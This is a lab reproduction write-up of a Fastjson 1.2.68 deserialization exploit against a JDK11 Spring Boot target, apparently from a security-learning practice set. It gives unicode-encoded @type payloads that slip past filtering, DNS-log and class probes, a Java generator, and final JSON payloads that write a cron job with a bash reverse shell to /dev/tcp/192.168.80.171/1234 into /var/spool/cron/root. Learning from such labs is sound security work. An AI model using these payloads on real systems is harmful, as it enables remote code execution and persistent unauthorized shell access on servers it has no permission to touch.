Reference: https://github.com/lemono0/FastJsonPart
The main focus is on reproducing a process to understand the vulnerability exploitation flow. There are many articles by experts online that are well-written, but they are not sufficient for foundational learning (especially regarding how to compile Java files using IDEA, how to resolve dependency issues, etc. -__-|). Therefore, I will document my own reproduction process.
07-1268-jkd11-writefile#
Capture packets, remove parentheses, and determine the version of fastjson.
DNS log probes fastjson and finds it has been filtered.
Perform unicode encoding on @type.
{
"\u0040\u0074\u0079\u0070\u0065": "java.net.InetSocketAddress" {
"address": ,
"val": "1bdmkeljntnmdy5h5nf3h571tszjn9by.oastify.com"
}
}
Received DNS log request.
Probe version.
{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"
Probe dependencies.
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "java.net.http.HttpClient"
}
}
Returning can not cast to char
indicates the presence of java.net.http.HttpClient
, which is JDK11.
org.springframework.web.bind.annotation.RequestMapping
is a class specific to SpringBoot, so the target environment is a SpringBoot environment.
{
"x": {
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
"\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
Having confirmed the use of JDK11, unrestricted file writing is possible. A scheduled task is used to write a reverse shell.
Generate exp file, jdk11.java.
import com.alibaba.fastjson.JSON;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Arrays;
import java.util.Base64;
import java.util.zip.Deflater;
public class jdk11 {
public static String gzcompress(String code) {
byte[] data = code.getBytes();
byte[] output = new byte[0];
Deflater compresser = new Deflater();
compresser.reset();
compresser.setInput(data);
compresser.finish();
ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
try {
byte[] buf = new byte[1024];
while (!compresser.finished()) {
int i = compresser.deflate(buf);
bos.write(buf, 0, i);
}
output = bos.toByteArray();
} catch (Exception e) {
output = data;
e.printStackTrace();
} finally {
try {
bos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
compresser.end();
System.out.println(Arrays.toString(output));
return Base64.getEncoder().encodeToString(output);
}
public static void main(String[] args) throws Exception {
String code = gzcompress("* * * * * bash -i >& /dev/tcp/192.168.80.171/1234 0>&1 \n");
//<=1.2.68 and JDK11
String payload = "{\r\n"
+ " \"@type\":\"java.lang.AutoCloseable\",\r\n"
+ " \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
+ " \"out\":\r\n"
+ " {\r\n"
+ " \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
+ " \"out\":\r\n"
+ " {\r\n"
+ " \"@type\":\"java.io.FileOutputStream\",\r\n"
+ " \"file\":\"/var/spool/cron/root\",\r\n"
+ " \"append\":false\r\n"
+ " },\r\n"
+ " \"infl\":\r\n"
+ " {\r\n"
+ " \"input\":\r\n"
+ " {\r\n"
+ " \"array\":\"" + code + "\",\r\n"
+ " \"limit\":1999\r\n"
+ " }\r\n"
+ " },\r\n"
+ " \"bufLen\":1048576\r\n"
+ " },\r\n"
+ " \"protocolVersion\":1\r\n"
+ "}\r\n"
+ "";
System.out.println(payload);
JSON.parseObject(payload);
}
}
Generate payload.
Note:
When writing a scheduled task, there are a few points to note:
-
The Linux system itself has limitations; CentOS and Ubuntu series differ in file writing locations and command methods. Here, since it is a CentOS system, it writes to the
/var/spool/cron/root
file, while on Ubuntu, it should write to the/etc/crontab
system-level scheduled tasks, not to the/var/spool/cron/crontabs/root
file, as this would involve permission changes and restarting the scheduled task service. -
When writing a scheduled task through this file writing vulnerability, a newline operation must be added at the end of the command to ensure that the command is a complete line; otherwise, it will not successfully reverse.
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"eJzTUtCCQoWkxOIMBd1MBTs1Bf2U1DL9kuQCfUNLIz1DMws9CwM9Q3NDfUMjYxMFAzs1QwUuAHKnDGw=",
"limit":1999
}
},
"bufLen":1048576
},
"protocolVersion":1
}
The length of the data written to the file must be the actual length of the data, which may differ from the length of the command written to the scheduled task due to some processing. Here, the method is also based on error handling; first, set the limit value as large as possible. Fastjson will throw the correct data offset due to the incorrect offset position, which is 59 here, so 59 is the actual data length.
{
"\u0040\u0074\u0079\u0070\u0065":"java.lang.AutoCloseable",
"\u0040\u0074\u0079\u0070\u0065":"sun.rmi.server.MarshalOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.util.zip.InflaterOutputStream",
"out":
{
"\u0040\u0074\u0079\u0070\u0065":"java.io.FileOutputStream",
"file":"/var/spool/cron/root",
"append":false
},
"infl":
{
"input":
{
"array":"H4sIAAAAAAAAANNS0IJChaTE4gwF3UwFOzUF/ZTUMv2S5AJ9Q0sjPUMzCz0LAz1Dc0N9QyNjEwUDOzVDBS4AGWjIeTkAAAA=",
"limit":59
}
},
"bufLen":1048576
},
"protocolVersion":1
}
Reverse shell will be triggered.